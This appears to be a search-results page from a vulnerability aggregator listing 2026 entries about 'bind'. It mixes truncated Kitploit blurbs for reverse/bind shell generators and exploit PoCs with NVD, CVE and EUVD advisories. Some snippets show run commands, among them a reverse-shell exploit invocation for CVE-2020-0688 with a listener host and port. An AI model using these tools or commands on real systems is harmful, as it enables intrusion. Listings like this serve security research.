Lucene search
+L

12688 matches found

Kitploit
Kitploit
added 2026/09/09 12:27 a.m.6 views

GoSH

GoSH Generador de shell reversa/enlace en Golang Descripción Esta herramienta genera un binario Go que lanza un shell del tipo deseado en el host objetivo. El binario del shell puede ser compilado para múltiples plataformas, soporta polimorfismo parcial nombres de funciones únicos y puede usar el...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/08 11:21 p.m.6 views

cve-2018-5740

CVE-2018-5740 PoC Named, which is received response from legimate authoritative server, is crashed by CVE-2018-5740. FILES named.conf: BIND configration file for authoritative server. example.com: zone file for authoritative server. named-full-resolver.conf: BIND configration file for victim...

7.5CVSS7.5AI score0.5962EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/08 11:03 p.m.6 views

msLDAPDump

msLDAPDump Herramienta de enumeración LDAP implementada en Python3 msLDAPDump simplifica la enumeración LDAP en un entorno de dominio al envolver la librería ldap3 de Python en una interfaz fácil de usar. Como la mayoría de mis herramientas, esta funciona mejor en Windows. Si se usa Unix, la...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/08 10:06 p.m.4 views

CVE-2017-3143

TSIG Bypass exploit Exploit for CVE-2017-3143 in Bind and CVE-2017-11104 in Knot DNS. See https://www.synacktiv.com/ressources/CVE-2017-3143BIND9TSIGdynamicupdatesvulnerabilitySynacktiv.pdf for more info. Author Clément Berthaux - clement dot berthaux at synacktiv dot com...

7.5CVSS7AI score0.18299EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/08 9:48 p.m.6 views

CVE-2020-8617

CVE-2020-8617 PoC for CVE-2020-8617 For educational purposes only Run This image runs a standard BIND server, which automatically generates a tkey "local-ddns". root@kitploit: $ docker run --rm --name cve-2020-8617 -it -p 53:53/udp knqyf263/cve-2020-8617 Exploit root@kitploit: $ pipenv install $...

7.5CVSS6.8AI score0.93422EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/08 7:53 p.m.3 views

CVE-2024-27348

🔥 CVE-2024-27348 Exploitation Toolkit 🎓 Academic Project 📚 Course: FC411 - Secure Network Design 👨‍🏫 Instructor: Dr. Maira Sultan 🏫 University: University of Prince Mugrin 📅 Year: 2025 ⚡ A complete toolkit for exploiting CVE-2024-27348 Apache Huge-Graph-Server developed as part of the FC411 course...

9.8CVSS8.4AI score0.9921EPSS
SaveExploits11
NVD
NVD
added 2026/09/08 6:18 p.m.3 views

CVE-2026-68825

Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally...

7CVSS
SaveExploits0References1
CVE
CVE
added 2026/09/08 5:12 p.m.6 views

CVE-2026-68825

CVE-2026-68825 is a use-after-free vulnerability in the Windows Bind Filter Driver that allows an authorized local attacker to escalate privileges. The attack requires low privileges , high complexity , and no user interaction , with a CVSS 3.1 base score of 7.0 (HIGH) reflecting full impact to c...

7CVSS
SaveExploits0References1
EUVD
EUVD
added 2026/09/08 5:12 p.m.4 views

EUVD-2026-73118

Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally...

7CVSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/08 4:58 p.m.7 views

ShellPop

ShellPop Acerca de ShellPop se trata de generar shells. Con esta herramienta puedes crear comandos de shell reversa o bind de manera fácil y sofisticada para ayudarte durante las pruebas de penetración. ¡No pierdas más tiempo con archivos .txt almacenando tus shells reversas! Instalación Se...

6AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/08 4:03 p.m.6 views

CVE-2020-0688

CVE-2020-0688 Working Exploit PoC CVE-2020-0688 - Reverse Bind Shell Tested using Python2.7 To Install: pip install -r requirements.txt To Run: python CVE-2020-0688-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444...

9CVSS8.2AI score0.99965EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/08 3:31 p.m.7 views

CVE-2024-21006_jar

CVE-2024-21006jar Exploit code reference: https://github.com/momika233/CVE-2024-21006 Here, the source code has been compiled into a JAR package for ease of use. The lib directory contains dependency files. If you wish to modify the source code, you can compile it yourself. Usage root@kitploit:...

7.5CVSS7AI score0.07854EPSS
SaveExploits1References3
NVD
NVD
added 2026/09/08 1:17 p.m.4 views

CVE-2026-75021

fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and...

8.1CVSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/08 12:52 p.m.4 views

CVE-2019-6467

CVE-2019-6467 BIND nxdomain-redirect For educational purposes only Run root@kitploit: $ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467 Exploit Normal query root@kitploit: $ dig @127.0.0.1 nxdomain.example.com nxdomain can be replaced by anything that means non-existe...

7.5CVSS6.9AI score0.05459EPSS
SaveExploits0
Cvelist
Cvelist
added 2026/09/08 12:50 p.m.15 views

CVE-2026-75021 fastify-cli vulnerable to remote code execution via ignored explicit Inspector bind address

fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and...

8.1CVSS
SaveExploits0References2
CVE
CVE
added 2026/09/08 12:50 p.m.10 views

CVE-2026-75021

fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and...

8.1CVSS
SaveExploits0References2
EUVD
EUVD
added 2026/09/08 12:50 p.m.3 views

EUVD-2026-72734

fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and...

8.1CVSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/08 10:10 a.m.4 views

metasploitable-pentest-report

Metasploitable 2 — Informe de Prueba de Penetración Descargo de responsabilidad: Esta prueba de penetración se realizó en un entorno de laboratorio privado y aislado de VMware con fines educativos únicamente. No se accedió a sistemas reales. Todas las direcciones IP han sido anonimizadas. Resumen...

10CVSS7.8AI score0.96184EPSS
SaveExploits49
Kitploit
Kitploit
added 2026/09/08 9:22 a.m.12 views

postshell

PostShell PostShell es un shell de post-explotación que incluye tanto un shell bind como un shell de conexión inversa. Crea un TTY completamente interactivo que permite el control de trabajos. El tamaño del stub es de aproximadamente 14 kb y se puede compilar en cualquier sistema similar a Unix...

6AI score
SaveExploits0
RedHat Linux
RedHat Linux
added 2026/09/08 9:06 a.m.3 views

kernel: udp: Fix wildcard bind conflict check when using hash2

A flaw was found in the Linux kernel's User Datagram Protocol UDP implementation. When a significant number of UDP sockets are bound to specific local addresses on the same port, the kernel's conflict detection mechanism can fail. This allows a local attacker to bind to a wildcard address on a po...

5.5CVSS0.00123EPSS
SaveExploits0References5
Rows per page
Query Builder